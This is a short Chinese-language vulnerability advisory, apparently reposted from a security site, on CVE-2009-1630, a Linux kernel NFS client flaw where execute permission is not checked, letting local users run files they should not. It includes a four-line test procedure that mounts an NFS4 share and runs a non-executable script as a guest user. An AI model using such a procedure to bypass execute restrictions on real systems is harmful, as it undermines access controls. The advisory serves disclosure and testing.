Linux Kernel NFS客户端实现MAY_EXEC权限检查漏洞
来源:岁月联盟
时间:2009-11-02
Linux kernel 2.6.x漏洞描述:
BUGTRAQ ID: 34934
CVE(CAN) ID: CVE-2009-1630
Linux Kernel是开放源码操作系统Linux所使用的内核。
如果atomic_open可用的话,Linux kernel NFS客户端实现中fs/nfs/dir.c的nfs_permission函数没有检查执行(EXEC或MAY_EXEC)权限位,这允许本地用户绕过限制执行文件。<*参考
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=500297
http://marc.info/?l=oss-security&m=124220557025302&w=2
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!mount -t nfs4 server:/ /mnt4
echo "ls" >/mnt4/foo
chmod 744 /mnt4/foo
su guest -c "mnt4/foo"SEBUG安全建议: